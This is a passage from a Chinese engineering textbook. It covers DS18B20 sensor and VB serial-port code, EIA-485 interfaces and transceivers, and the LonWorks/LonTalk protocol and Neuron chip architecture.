dat=(j<<7)(dat>>1);//读出的数据最低位在最前面,这样刚好一个 字节在dat里 } return(dat); } voidtmpwritebyte(uchardat)//向传感器写一个字节数据 { uinti; ucharj; bittestb; for(j=1;j<=8;j++) { testb=dat&0x01; dat=dat>>1; if(testb)//写“1” { DS=0; i++;i++; DS=1; i=8;while(i>0)i--; } else { DS=0;//写“0” i=8;while(i>0)i--; DS=1; i++;i++; } } } 4.上位机系统软件设计 上位机软件采用VB编写,在上位机窗口中可以显示实时采集的温度值,并按照一定时间间隔将温度值存储在PC中,便于对温度数据的长期管理与运用。 VB界面程序设计如下: PrivateSubForm_Load()′初始化串口 MSComm1.CommPort=3′设置串口3 MSComm1.Settings="9600,n,8,1"′波特率为9600bit/s,无校验,8位数据位,1位停止位 MSComm1.PortOpen=True′打开串口 MSComm1.RThreshold=1′每接收到一个字符就会产生onComm事件 MSComm1.SThreshold=0′不产生onComm事件 MSComm1.InputLen=0′读取接收缓冲区里的所有数据 MSComm1.InputMode=comInputModeText′以文本的方式读取接收到的数据 MSComm1.InBufferCount=0′清空接收缓冲区 Me.Caption="串口通信"′给窗体命名 EndSub PrivateSubCommand1_Click()′发送数据 DimSendDataAsVariant DimSendArr(0)AsByte′定义一个字节型(二进制)的数组 SendData=Check1(0).Value+Check1(1).Value∗2+Check1(2).Value∗4+ Check1(3).Value∗8+Check1(4).Value∗16+Check1(5).Value∗32+Check1(6). Value∗64+Check1(7).Value∗128 SendArr(0)=CByte(SendData)′把SendData转化成字节型 MSComm1.Output=SendArr′把数据发送出去 Text1.Text="0x"+Hex(SendData)′把发送的数据以十六进制显示 EndSub PrivateSubMSComm1_OnComm()′接收数据 DimrecAsString SelectCaseMSComm1.CommEvent CasecomEvReceive′判断是否接收到数据 rec=MSComm1.Input′读取接收缓冲区接收到的数据 Text2.Text=rec′显示接收到的数据 MSComm1.InBufferCount=0′清空接收缓冲区 EndSelect EndSub 3.3EIA⁃485串行通信接口技术 由于EIA⁃232⁃D通信距离较近,当传输距离较远时,可采用EIA⁃485串行通信接口。 EIA⁃485传输技术的基本特性为: 1)网络拓扑为总线型结构,两端带有终端电阻。 2)传输速率为9.6kbit/s~12Mbit/s,电缆长度取决于传输速率。 3)介质为屏蔽/非屏蔽双绞线,这取决于环境条件。 4)每段32个站(不带中继器),最多127个站(带中继器)。 5)最好使用9针D型插头。 3.3.1EIA⁃485接口 EIA⁃485接口采用二线差分平衡传输,其信号定义如下:采用+5V电源供电,若差分电压信号为-2500~-200mV时,为逻辑“0”;若差分电压信号为+200~+2500mV时, 为逻辑“1”;若差分电压信号为-200~+200mV时,为高阻状态。 EIA⁃485总线采用差分平衡电路,其一根导线上的电压是另一根导线上的电压值取反,接收器的输入电压为这两根导线电压的差值(VA-VB)。 EIA⁃485接口标准实际上是EIA⁃422接口标准的变型。EIA⁃422采用两对差分平衡线路,而EIA⁃485只用一对。差分电路的最大优点是抑制噪声,由于在它的两根信号线上传递着大小相同、方向相反的电流,而噪声电压往往在两根导线上同时出现,一根导线上出现的噪声电压会被另一根导线上出现的噪声电压抵消,因而可以极大地削弱噪声对信号的影响。差分电路的另一个优点是不受节点间接地电压差异的影响。在非差分(即单端)电路中,多个信号共用一根接地线,长距离传输时,不同节点接地线的电压差异可能相差好几伏,甚至会引起信号的误读,差分电路则完全不会受到接地电压差异的影响。EIA⁃485价格比较便宜,能够很方便地添加到任何一个系统中,支持比EIA⁃232⁃D更长的距离、更快的速度以及更多的节点。 根据它们各自的技术参数可以看出,EIA⁃485更适用于多台计算机或带微控制器的设备之间的远距离数据通信。应该指出的是,EIA⁃485标准没有规定连接器、信号功能和引脚分配,要保持两根信号线相邻,两根差动导线应该位于同一根双绞线内,引脚A与引脚B不能调换。 3.3.2EIA⁃485收发器 EIA⁃485收发器种类较多,如Maxim公司的MAX485,TI公司的SN75LBC184、SN65LBC184、高速型SN65ALS1176等。它们的引脚是完全兼容的,其中SN65ALS1176主要用于高速应用场合,如PROFIBUS⁃DP现场总线等。下面仅介绍SN75LBC184。SN75LBC184为差分收发器,具有瞬变电压抑制功能,SN75LBC184为商业级,其工业级产品为SN65LBC184。 SN75LBC184和SN65LBC184具有如下特点: 1)具有瞬变电压抑制能力,能防雷电和抗静电放电冲击。 2)具有限制斜率驱动器,使电磁干扰减到最小,并能减少传输线终端不匹配引起的反射。 3)总线上可挂接64个收发器。 4)接收器输入端开路故障保护。 5)具有热关断保护。 6)低禁止电源电流,最大为300μA。 7)引脚与SN75176兼容。 3.3.3EIA⁃485接口的典型应用 在图3⁃14中,EIA⁃485收发器可以采用SN75LBC184、SN65LBC184、MAX485等芯片。当P1.0为低电平时,接收数据,为高电平时,发送数据,当P1.0变为高电平发送数据之 前,应当延时几十微秒的时间,尤其是在P1.0和DE之间接有光耦合器时,延时时间还应更长些,否则开始发送的几个字节数据可能会丢失。 采用EIA⁃485组成总线型拓扑结构的分布式测控系统时,如果传输距离较长(超过100m),为了抑制干扰,在双绞线终端还要接120Ω的终端电阻。 3.3.4EIA⁃485网络互联 使一个或多个信号发送器与接收器互连,可以利用EIA⁃485接口,在多台计算机或带微控制器的设备之间实现远距离数据通信,形成分布式测控网络系统。 1.EIA⁃485的半双工通信方式 在大多数应用条件下,EIA⁃485的端口连接都采用半双工通信方式,多个驱动器和接收器共享一条信号通路。图3⁃15所示为EIA⁃485端口半双工连接的电路图,其中EIA⁃485差动总线收发器采用SN75LBC184。图3⁃15中的两个120Ω电阻是作为总线的终端电阻存在的,当终端电阻等于电缆的特征阻抗时,可以削弱甚至消除信号的反射。特征阻抗是导线的特征参数,它的数值随着导线的直径、在电缆中与其他导线的相对距离以及导线的绝缘类型的变化而变化,特征阻抗值与导线的长度无关,一般双绞线的特征阻抗为100~150Ω。 EIA⁃485的驱动器必须能驱动32个单位负载加上一个60Ω的并联终端电阻,总的负载包括驱动器、接收器和终端电阻,不低于540Ω。图3⁃15中两个120Ω电阻的并联值为60Ω,32个单位负载中接收器的输入阻抗会使总负载略微降低;而驱动器的输出与导线的串联阻抗又会使总负载增大,最终需要满足不低于540Ω的要求。还应该注意的是,在一个半双工连接中,同一时间内只能有一个驱动器工作。如果发生两个或多个驱动器同时启用,一个企图使总线上呈现逻辑1,另一个企图使总线上呈现逻辑0,则会发生总线竞争,在某些元件上就会产生大电流,因此,所有EIA⁃485的接口芯片上都必须有限流和过热关闭的功能,以便在发生总线竞争时保护芯片不受损坏。 2.EIA⁃485的全双工连接 尽管大多数EIA⁃485的连接是半双工的,但是也可以形成全双工EIA⁃485连接。图3⁃16所示为两点之间的全双工EIA⁃485连接电路,在全双工连接中,信号的发送和接收方向都有各自的通路。在全双工、多节点连接中,一个节点可以在一条通路上向所有其他节点发送信息,而在另一条通路上接收来自其他节点的信息。 两点之间全双工连接的通信在发送和接收上都不会存在问题,但当多个节点共享信息通路时,需要以某种方式对网络控制权进行管理,这是在全双工、半双工连接中都需要解决的问题。 第4章 LonWorks控制网络 LON(LocalOperatingNetworks)是由美国埃施朗(Echelon)公司于1990年开发,并由Motorola、TOSHIBA公司共同倡导的控制系统局部操作网络。1992年,Echelon公司成功推出了LonWorks智能控制网络解决方案,开发了配套的LonWorks现场总线控制系统技术。LonWorks技术为LON总线设计和成品化提供了一套完整的开发平台,给各种控制网络应用提供了端到端的解决方案。目前,LonWorks技术已成为全球通用的开放式标准先锋,它采用ISO/OSI模型的全部七层通信协议,采用面向对象的设计方法,通过网络变量把网络通信 设计简化为参数设置。支持双绞线、同轴电缆、光缆和红外线等多种通信介质,通信速率从300bit/s~1.5Mbit/s不等,直接通信距离可达2700m(78kbit/s),被誉为通用控制网络。LonWorks技术采用的LonTalk协议被封装到神经元(Neuron)芯片中,并得以实现。由于LonWorks技术具有高可靠性、安全性、易于实现和互操作性的特点,采用LonWorks技术和神经元芯片的产品被广泛应用在楼宇自动化、家庭自动化、安防系统、办公设备、交通运输、电梯控制、过程控制、环境监视、火灾报警、污水处理、能源管理等行业。在楼宇自动化、家庭自动化、智能通信产品等方面,LonWorks具有独特的优势。 4.1LonWorks技术特点 1.LonTalk通信协议 LonWorks技术具有支持OSI七层模型的LonTalk通信协议,LonTalk通信协议是一种直接面向对象的网络协议,这是LON总线最突出的特点。LonTalk为设备之间交换控制状态信息建立了一种通用的标准,在LonTalk通信协议的协调下,使相应的系统和产品融为一体,形成一个网络控制系统。LonTalk协议通过神经元芯片上的硬件和固件实现介质存取、事务确认和点对点通信服务,还可实现如认证、优先级传输、单播/广播/组播消息发送等高级服务。 2.神经元芯片 神经元芯片是LonWorks技术的核心,它不仅是LON总线的通信处理器,而且作为采集和控制的通用处理器,LonWorks技术中所有关于网络的操作实际上都是通过它来完成的。 神经元芯片内部装有3个8位微处理器,同时有通信接口和34种I/O对象及定时器/计数器,另外还具有RAM、ROM、EEPROM、LonTalk通信协议等。神经元芯片已提供了Lon⁃Talk协议的第1~6层,开发者只需用NeuronC语言开发即可。神经元芯片具备通信和控制功能。 3.基于LNS(LonWorksNetworkOperatingSystem)的软件工具 LonWorks技术有多种基于LNS的工具,用于LON网络的维护和组态。其中,LonMaker是图形化工具,用于图形绘制、系统调试和网络的维修保养。LonMaker含有LNS、画图工 具Visio2000技术版,还支持经由LonWorks网络或TCP/IP网络的远程操作,支持与TCP/IP网络及互联网联网的接口技术i.LON。 为了使LON总线的使用者快速、方便地开发节点和联网,LonWorks技术中还包含一系列的开发工具,例如,节点开发工具NodeBuilder、节点和网络安装工具LonBilder、网络管理工具LonManager以及客户/服务器网络构架———LNS技术。 4.互操作性 为了更好地推广LonWorks技术,1994年5月,由世界许多大公司,如Motorola、IBM、TOSHIBA、ABB、HP、Honeywell等,组成了一个独立的行业协会LonMark,用来负责定义、发布和确认产品的互操作性标准。LonMark是与Echelon公司无关的LonWorks用户标准化组织,按照LonMark规范设计的LonWorks产品,都能够非常容易地集成在一起。LonMark协会的成立,对LonWorks技术的推广和发展起到了极大的推动作用。 5.LonWorks技术的组成部分与LON系统的开发(1)LonWorks技术的组成部分其组成部分主要包括: 1)LonWorks节点。 2)LonTalk协议。 3)LonWorks网络连接设备。 4)LonWorks收发器。 5)LonWorks路由器。 6)基于LNS(LonWorksNetworkOperatingSystem)的LON网络服务工具。 7)LonWorks网络和节点开发工具。 8)LonWorks网络管理工具。 (2)LON系统的开发LON总线系统有两种开发途径: 1)基于开发工具LonBuilder或NodeBuilder,使用NeuronC语言编程,即针对具体控制系统的要求编写应用代码,然后经过编译与通信协议代码连接生成总的目标代码,一起烧录到节点的存储器中。 2)基于图形方式的软件开发工具VisualControl,通过组态构成控制系统,自动编译生成总的目标代码,直接下载到节点的FlashROM中。而对复杂系统,需编制自定义模块。 4.2LonTalk协议 本节从LonTalk协议简介、LonTalk各层协议及功能等方面来讲述LonTalk协议的特点以及LonTalk协议使用中应注意的问题。 4.2.1LonTalk协议简介 LonTalk协议是LON总线的专用协议,是LonWorks技术的核心。LonTalk协议提供一系列通信服务,使得一个设备的应用程序可以在不了解网络拓扑、名称、地址或其他设备功能的情况下发送和接收网络上其他设备的报文。LonTalk协议能提供端到端报文确认、报文认证、打包业务和优先传送服务,提供网络管理服务的支持,并允许远程网络管理工具与网络设备进行交互。其对网络管理业务的支持使远程网络管理工具能通过网络和其他装置相互作用,包括网络地址和参数的重新配置,下载应用程序,报告网络问题和节点应用程序的起始、终止、复位。 LonTalk协议是一个分层的、以数据包为基础的对等的通信协议。像以太网和因特网协议一样,它是一个公开的标准,并遵守国际标准化组织(ISO)的分层体系结构要求。但是LonTalk协议设计满足用于控制系统而不是数据处理系统的特定要求。每个数据包由可变数目的字节构成,长度不定,并且包含应用层的信息以及寻址和其他信息。信道上的每个装置监视在信道上传输的每个数据包,以确定自己是否是收信者。假如是收信者,则处理该数据包,以判明它是包含节点应用程序所需的信息,或者它是否是个网络管理包。应用包中的数据是提供给应用程序的,如果合适,则要发一个应答报文给发送装置。 为了处理网络上的报文冲突,LonTalk协议使用类似以太网所用的“载波监听多路访问”(CSMA)算法。LonTalk协议建立在CSMA基础上,提供介质访问协议,因而可以根据预测网络业务量发送优先级报文和动态调整时间片的数目。通过动态调整网络带宽,采用P⁃坚持CSMA协议的算法使网络能在极高网络业务量出现时继续运行;而在业务量较小时不降低网络速度。 1.LonTalk协议特征与优点 LonTalk协议具有以下特点: 1)发送的报文都是很短的数据(通常几个到几十个字节)。 2)通信带宽不高(几kbit/s到2Mbit/s)。 3)网络上的节点往往是低成本、低维护费用的单片机。 4)多节点、多通信介质。 5)可靠性和实时性高。 此外,LonTalk协议所支持的多种服务又提高了其可靠性、安全性,提升网络资源的优化程度。这些服务的特征和优点包括: 1)支持可靠通信,包括防范未经授权而使用的系统。 2)支持混合介质和不同通信速度构成的网络。 3)支持有几万个节点的网络,但在只有几个节点的网络中同样有效。 4)允许对等通信,这样就使它可用于分布式控制系统。 5)实施协议内网络管理问题的解决方案。 2.LonTalk的协议标准 LonTalk协议是分层的、基于数据包的对等通信协议。它符合ISO制订的开放系统互联OSI标准,具有完备的七层协议,具有LON总线的所有网络通信功能,包含一个网络操作系统,通过网络开发工具生成固件,使通信数据在各种介质中非常可靠地传输。由于Lon⁃Talk协议对OSI的七层协议的支持,使LON总线能够利用网络变量直接面向对象通信,通过网络变量的互相连接便可实现节点之间的通信。 4.2.2LonTalk的各层协议与功能 1.物理层 物理层定义了在通信信道上位流的传输,它确保一个源设备发送的位流可准确地被目的设备接收。LonTalk协议在物理层中支持多种通信协议,换句话说就是为了适应不同的通信介质需要支持不同的数据解码与编码。例如,通常双绞线使用差分曼彻斯特编码,电力线使用扩频,无线通信使用频移键控。由于LonTalk协议考虑到对各种介质的支持,因而LonWorks网络可以容许使用的通信介质非常广泛,如双绞线(Twisted⁃Pair)、电力线(Powerline)、无线射频(Radio⁃Frequency)、红外线(Infrared)、同轴电缆(CoaxialCable)和光纤(Fi⁃ber),甚至是用户自定义的通信介质。 LonTalk协议支持在通信介质上的硬件碰撞检测,如双绞线。LonTalk协议还可以自动地取消正在发送碰撞的报文,重新再发。如果没有碰撞检测,那么当有碰撞发生时,只有当响应或者应答超时的情况下才会重发报文。 2.链路层 (1)MAC子层LonTalk协议的介质访问控制(MediaAccessControl,MAC)层是数据链路层的一部分。为使数据帧传输独立于所采用的物理介质和介质访问的控制方法,将数据链路层分为两个子层:逻辑链路控制(LogicalLinkControl,LLC)和介质访问控制(MAC),LLC与介质无关,MAC则依赖于介质。MAC协议是确定设备安全地传送数据包、减少冲突的控制算法,它使用OSI标准接口和链路层的其他部分进行通信。 LonTalk协议使用改进的CSMA(载波信号多路侦听)协议,称为带预测的P⁃坚持CS⁃MA(PredictiveP⁃PresistentCSMA)。它不但保留了CSMA协议的优点,还克服了其在控制网络中的不足。带预测的P⁃坚持CSMA的MAC层协议数据单元(MACProtocolDataUnit,MPDU)格式如图4⁃2所示。带预测的P⁃坚持CSMA使所有的节点根据网络积压参数(Backlog)等待随机时间片来访问介质,这就有效地避免了网络的频繁碰撞。每一个节点发送前随机地插入0~W个很小的随机时间片,因此网络中任一节点在发送普通报文前平均插入W/2个随机时间片,而W则根据网络积压参数变化进行动态调整,其公式是W=BL×Wbase,其中,Wbase=16,BL为网络积压的估计值,它是对当前发送周期有多少个节点需要发送报文的估计。 带预测的P⁃坚持CSMA概念示意图如图4⁃3所示。当一个节点有信息需要发送而试图占用通道时,首先在Beta1周期检测通道有没有信息发送,以确定网络是否空闲。若空闲,节点产生一个随机等待T,T为0~W个时间片Beta2中的一个,当延时结束时,网络仍为空闲,节点发送报文,否则节点检测是否需接收信息,然后再重复MAC算法。 BL值是对当前网络繁忙程度的估计。每一个节点都有一个BL值,当侦测到一个MPDU或发送一个MPDU时,BL值加1,同时每隔一个固定报文周期BL值减1,把BL值放到MP⁃DU中。当BL值减到1时,就不再减,总是保持BL⩾1。采用带预测的P⁃坚持CSMA允许网络在轻负载的情况下,插入较少的随机时间片,节点发送速度快;而在重负载的情况下,随着BL值的增加,插入较多的随机时间片,又能有效避免碰撞。 综上所述,LonWorks的MAC子层有以下优点:支持多介质的通信,支持低速率的网络,可以在重负载的情况下保持网络性能,保证在过载情况下不会因为冲突而降低吞吐量。当使用支持硬件冲突检测的传输介质(如双绞线)时,一旦收发器检测到冲突,LonTalk协议就可以有选择地取消报文的发送,这使节点可以马上重新发送并使冲突不再重发,有效地避免了碰撞。 在MAC层中,为提高紧急事件的响应时间,提供了一个可选择的优先级的机制,如图4⁃4所示,该机制允许用户为每一个需要优先级的节点分配一个特定的优先级时间片(PrioritySlot)。在发送过程中,优先级数据报文将在那个时间片里将数据报文发送出去。优先级时间片从0~127,0表示不需要等待立即发送,1表示等待一个时间片,2表示等待两个时间片,…,127表示等待127个时间片。低优先级的节点需等待较多的时间片,而高优先级的节点需等待较少的时间片。这个时间片加在P⁃预测时间片之前,非优先级的节点必须等待优先级时间片都完成之后,才再等待P⁃预测时间片后发送,因此加入优先级的节点总比非优先级的节点具有更快的响应时间。 (2)链路层链路层提供子网内链路层数据单元(LinkProtocolDataUnit,LPDU)帧顺序的无响应传输。它提供错误检测能力,但不提供错误恢复能力。当一帧数据CRC校验 错,则该帧被丢掉。在直接互连模式下,物理层和链路层接口的编码是曼彻斯特编码,在专用模式下根据不同的电气接口采用不同的编码方案。CRC校验码加在网络层数据单元(NetworkProtocolDataUnit,NPDU)帧的最后,CRC采用的多项式是x 16+x12+x5+1(标准CCITTCRC⁃16编码)。 3.网络层 网络层定义设备名称和地址,确定源设备的报文如何选择路由到达一台或多台目的设备,以及当源设备和目的设备不在同一信道上时,如何确定报文路由。在网络层,LonTalk协议提供给用户一个简单的通信接口,定义了如何接收、发送和响应等,在网络管理上有网络地址分配、出错处理、网络认证、流量控制和路由器机制。 (1)LonTalk协议的网络地址结构地址是一个对象或一组对象的特有标识,是可以改变的。LonTalk地址唯一地确定一个LonTalk数据包的源节点或目标节点,路由器则利用这些地址在信道之间选择数据包的传输路径。为了简化路由选择,LonTalk协议定义了分级的网络地址形式:域(Domain)、子网(Subnet)和节点(Node)地址,除此之外还有组地址。 (2)寻址格式一个通道是指在物理上能独立发送报文(不需要转发)的一段介质。LonTalk规定一个通道至多有32385个节点,通道并不影响网络的地址结构,域、子网和分组都可以跨越多个通道,一个网络可以由一个或多个通道组成。通道之间是通过桥接器 (Bridge)来连接的,这样做不仅可以实现多介质在同一网络上的连接,而且可以使一个通道的网络信道不致过于拥挤。尽管NeuronID也可以作为地址,但它不能作寻址的唯一方式,这是因为该寻址方式只支持一对一的传输,使用其作为地址将需要过于庞大的节点路由表以优化网络流量。域/NeuronID寻址方式是在网络安装期间对节点进行初始配置时,由网络管理工具将每个节点配置给一个或两个域,并且配置子网和节点标识码。节点有5种寻址格式。寻址格式确定了地址格式的字节数,每种寻址格式的字节数见表4⁃2。在每一种地址格式子网上,“0”意味着节点不知道其子网号。需要注意的是,在计算整个地址长度时,应在表4⁃2中给出的地址长度基础上再加上域地址长度(该域地址长度范围为0~6B)。 4.LonTalk协议的传输层和会话层 LonTalk协议的核心部分是传输层和会话层。一个传输控制子层管理着报文执行的顺序、报文的二次检测。传输层是无连接的,它提供一对一节点、一对多节点的可靠传输,信息认证(Authentication)也是在这一层实现的。 会话层主要提供了请求/响应的机制,它通过节点的连接来进行远程数据服务(RemoteServers),因此使用该机制可以遥控实现远端节点的过程建立。LonTalk协议的网络功能虽然是在应用层来完成的,但实际上也是由提供会话层的请求/响应机制来完成的。 5.LonTalk协议的表示层和应用层 LonTalk协议的表示层和应用层提供5类服务: (1)网络变量的服务在LonTalk协议表示层的数据项称为网络变量,网络变量可以是单个的数据项(NeuronC变量),也可以是一个数据结构或数组,其最大长度可达31B。网络变量用关键字Network在应用程序中定义,每个网络变量都有其数据类型。对于基于神经元芯片的节点来说,当定义为输出的网络变量改变时,能自动地将网络变量的值变成应用层协议数据单元(APDU)下传并发送,使所有把该变量定义为输入的节点受到该网络变量的改变。当收到信息时,能根据上传的APDU判断是否是网络变量,以及是哪一个输入网络变量并激活相应的处理进程。 (2)显示报文的服务将报文的目的地址、报文服务方式、数据长度和数据组成APDU下传并发送,将发送结果上传并激活相应的发送结果处理进程。当收到信息时,能根据上传APDU判断是否显示报文,并根据报文代码激活相应的处理进程。 (3)网络管理的服务一个LonWorks网络是否需要一个网络管理节点,取决于实际应用的需求。一个网络管理节点具有以下功能:分配所有节点的地址单元(包括域号、子网号、节点号以及所属的组名和组员号,值得注意的是,NeuronID是不能分配的)和设置配置路由器的配置表。在一个开发环境中,网络管理节点的应用相当于LonBuilder开发平台的网络管理器,其任务包括定义、配置、下载和控制LonWorks网络。LonBuilder协议分析仪具有监视、采集和显示网络通信流量以及性能统计等功能。 (4)网络跟踪的服务网络跟踪提供对节点的查询和测试,查询节点的工作状态以及一些网络的通信的错误统计,包括通信CRC出错、通信超时等,并发送一些测试命令对节点进行测试。这些信息被网络管理初始化,测试网络上的所有操作,记录错误信息和错误点。 (5)外来帧传输的服务该服务主要针对网关(Gateway),将LON总线外其他的网络信息转换成符合LonTalk协议的报文传输,或反之。 4.2.3LonTalk协议其他方面的问题 1.LonTalk协议的报文服务 LonTalk协议提供4种类型的报文服务,这些报文服务除请求⁃响应是在会话层实现,其他3种都在传输层实现。这4种类型的报文服务如下。 (1)应答服务当一个节点发送报文到另一个节点或一个分组时,每一个接收到报文的节点都分别向发送方发应答,如果发送方在应答时间内没有收到全部应答,则发送方将重新发送该报文,重发次数和应答时间都是可选的。 (2)请求⁃响应方式当一个节点发送报文到另一个节点或一个分组时,每一个接收到报文的节点都分别向发送方发响应,如果发送方在响应时间内没有收到全部响应,则发送方将重新发送该报文,重发次数和响应时间都是可选的。 (3)非应答重发方式当一个节点发送报文到另一个节点或一个分组时,不需要每一个接收到报文的节点都向发送方发应答或响应,而采用重复多次发送同一报文的方式,使报文尽可能可靠地被接收方收到。 (4)非应答方式当一个节点发送报文到另一个节点或一个分组时,不需要每一个接收到报文的节点向发送方发应答或响应,也不必重复多次发送同一报文。 2.LonTalk网络认证 LonTalk协议支持报文认证,收发双方在网络安装时约定一个6B的认证字,接收方在接收报文时判断其是否是经发送方认证的报文,只有经过发送方认证的报文方可接收。 3.LonTalk协议的网络管理和网络诊断 LonTalk协议的网络管理和网络诊断提供了以下4类服务: 1)地址分配。分配所有节点的地址单元,包括域号、子网号、节点号以及所属的组名和组员号,NeuronID是不能分配的。 2)节点查询。包括节点查询的工作状态以及一些网络通信的错误统计,包括通信CRC出错、通信超时等。 3)节点测试。用发送测试命令来对节点进行测试。 4)设置配置路由器的配置表。 4.3LonWorks通信控制器——神经元芯片 4.3.1概述 神经元芯片是LonWorks技术的核心,它使用CMOSVLSI技术,主要包含两大系列: MCI43150和MCI43120。MCI43150芯片没有内部ROM,但含有访问外部存储器的接口,寻址空间可达64KB,适合更为复杂的应用;而MCI43120则不支持外部存储器,它本身带有ROM存储器。 神经元芯片的主要性能特点有: 1)所需外部器件较少,高度集成。 2)内含3个8位CPU,分别实现不同的功能,输入时钟范围可选:625kHz~10MHz。 3)两个16位定时计数器,15个软定时器。 4)网络通信端口可设置为3种工作方式:单端模式、差分模式、专用模式。 5)48位的内部神经元ID,用于唯一识别神经元芯片。 6)提供服务引脚,用于远程识别和诊断。 7)在外部存储器中,可固化LonTalk协议、事件驱动多任务调度程序和I/O驱动程序等固件。 8)有11个可编程I/O引脚,可设置为34种预编程工作方式,其中IO0~IO3带有20mA高电流接收;IO0~IO7可设置为低电平检测锁存;IO0~IO10可设置为TTL标准输入;IO4~IO7可以通过编程设置成带上拉电阻。 4.3.2神经元芯片的结构 1.神经元芯片的硬件结构 神经元芯片在内部结构上有许多优点,它可提供通信、控制、介质访问和I/O接口等功能,其内部结构图如图4⁃5所示。 2.神经元芯片的处理单元 神经元芯片内部装有3个微处理器:MAC通信处理器、网络处理器和应用处理器。3个处理器和存储器结构的框图如图4⁃6所示。 MAC通信处理器完成介质访问控制,也就是LonTalk7层协议的第1、2层,包括驱动通信子系统硬件和执行MAC算法。网络处理器完成LonTalk协议的第3~6层,它处理网络变量、地址、认证、后台诊断、软件定时器、网络管理和路由等进程。同时,它还控制网络通信端口、物理地址发送和接收数据包。网络处理器使用网络缓冲区与MAC处理器进行通信,使用应用缓冲区与应用处理器进行通信。应用处理器完成用户的编程,其中包括用户程序对操作系统的服务 调用。 在神经元芯片中,每个CPU都有自身的寄存器组,但所有的CPU都可以通过使用存储器和算术逻辑单元ALU共享数据。 3.存储器 神经元芯片有4种类型的存储器: (1)EEPROM各种类型的神经元芯片都有内部EEPROM,其用于存储网络配置和寻址信息、唯一的48位神经元芯片标识码、用户应用程序代码和常用数据。EEPROM中的用户代码在程序控制下写入和擦除,两者的总时间是20ms/B,可以在数据不丢失情况下,向EEPROM写入10000次。3120神经元芯片的EEPROM存储安装详细信息(网络地址和通信参数等)和由LonBuilder或NodeBuilder开发工具产生的应用程序,3150神经元芯片的EEPROM存储安装详细信息及其应用程序代码,其应用程序代码也可存储到外接存储器。 (2)RAMRAM用来存储堆栈段应用和系统数据,以及LonTalk协议网络缓冲区和应用缓冲区数据。只要神经元芯片维持加电状态,RAM状态就会保持[甚至在睡眠(Sleep)方式下],当芯片复位(Reset)时,RAM内容清除。 (3)ROM所有3120神经元芯片包括10KB的ROM,3150芯片无ROM。ROM用来存储神经元芯片固件,包括LonTalk协议、事件驱动任务调度器和应用函数库。 (4)外部存储器3150芯片不包括片上ROM,但可以允许寻址59392B的外部存储器。外部存储器存储应用程序和数据(可多达43008B)、神经元芯片固件和保留空间 (16384B),其中43008B中也可包括网络缓冲区和应用缓冲区。 4.网络通信端口 神经元芯片可以支持多种通信介质。使用最为广泛的是双绞线,其次是电力线,其他包括无线射频、红外线、光纤和同轴电缆等。 神经元芯片通信端口为适合不同的通信介质,可以将5个通信引脚配置成3种不同的接口模式,以适合不同的编码方案和不同的传输速率。这3种模式是:单端模式(Single⁃En⁃ded⁃Mode)、差分模式(DifferentialMode)和专用模式(SpecialPurposeMode) (1)单端模式单端模式是在LON总线中使用最广泛的一种模式,无线、红外、光纤66和同轴电缆都使用该模式。如图4⁃9所示,数据通信通过单端输入输出引脚CP0和CP1。该模式还包含低有效的睡眠输出(CP3),当神经元芯片进入睡眠状态时,它可使收发器进入掉电状态。 在单端模式下,数据编码和解码使用的是差分曼彻斯特编码(DifferentialManchesterEn⁃coding)。在开始发送报文之前,神经元芯片发送端初始化输出数据(CP1)引脚为低,然后发出发送允许信号(CP2),这样确保数据发送的开始是从低到高。在正式发送报文之前,发送端发送一个同步头(Preamble)以确保接收节点接收时钟同步。该同步头包括一个位同步域和字节同步域,位同步域是一串差分曼彻斯特编码的“1”,位同步域的长度是可变的,以适应不同的通信介质;字节同步域是1位差分曼彻斯特编码的“0”,表示同步头结束,开始正式报文的第一个字节。报文结束时,神经元芯片通信端口强制差分曼彻斯特编码为一个线路空码(Line⁃CodeViolation),并保持到接收端确认发送的报文结束。线路空码根据发送数据的最后1位的高低状态来保持线路在线路空码时为高电平或低电平,它在CRC码的最后1位开始,延时2位的时间。值得注意的是最后1位没有跳变沿,所以该电平一直保持2.5位时间,发送允许引脚一直保持到线路空码结束,然后释放。 作为选项,神经元芯片支持一个低有效的收发器碰撞检测信号。如果允许碰撞检测,在发送过程中,神经元芯片侦测到CP4在一个系统时钟(在10MHz主频时为200ns)为低,表示碰撞产生或正在发送,并通知神经元芯片,报文重发。如果神经元芯不支持碰撞检测,唯一能够获得数据被可靠传输的方法是采用应答方式或请求/响应方式。当采用应答方式或请求/响应方式时,需要设置重发时间———表示数据从发送完到响应所需的最长时间(在1.25Mbit/s线路不包含路由器的情况,典型的是48~96ms)。如果在重发时间内没有收到响应或应答报文,报文将重新发送。两次发送间隔包含Beta1和Beta2两个时间片。Beta1是在两次发送之间的一个固定的网络空闲时间片,优先级时间片和非优先级时间片包含在Beta2时间片中。 (2)差分模式在差分模式下,神经元芯片支持内部的差分驱动。差分模式的通信口配置如图4⁃10所示。采用差分模式类似于单端模式,区别是差分模式包括一个内部差分驱动,同时不再包括睡眠输出。差分模式也是采用差分曼彻斯特编码,数据格式完全和单端模式相同。 (3)专用模式在一些专用场合,需要神经元芯片直接提供没有编码和不加同步头的原始报文。在这种情况下,需要一个智能的收发器处理从网络上或从神经元芯片上来的数据。发送的过程是从神经元芯片接收到这种原始报文,重新编码,并插入同步头;接收的过程是从网络上收到数据,去掉同步头,重新解码,然后送到神经元芯片。 5.时钟信号 神经元芯片有一振荡器使用外接晶体或陶瓷共振器电路来产生输入时钟CLK1。对低功耗的应用,神经元芯片输入时钟频率范围可为625kHz~10MHz。其有效输入时钟频率是10MHz、5MHz、2.5MHz、1.25MHz和625kHz。还可以用另外一种方法来获取输入时钟:外部产生时钟信号驱动神经元芯片上符号为CLK1的CMOS输入引脚,此时符号为CLK2的引脚必须悬空或用来驱动最多一个外部CMOS负载。时钟频率的精度为±1.5%或更精确,以确保各节点能比特同步。 6.休眠/唤醒电路 (1)休眠电路神经元芯片在软件控制下可进入低功耗的休眠状态。这种状态下,振荡器、系统时钟、通信端口以及所有的定时器/计数器都关闭,但所有的状态信息,包括片上RAM的内容仍然保留。 (2)唤醒电路当检测到有唤醒事件时,神经元芯片将允许振荡器起振,等待进入稳定状态,完成内部维护后恢复操作。内部维护所需时间取决于几个重要的应用参数:忽略通信选项、接收事务数和应用定时器数,还取决于在此期间网络处理器是否正在修复应用定时器。 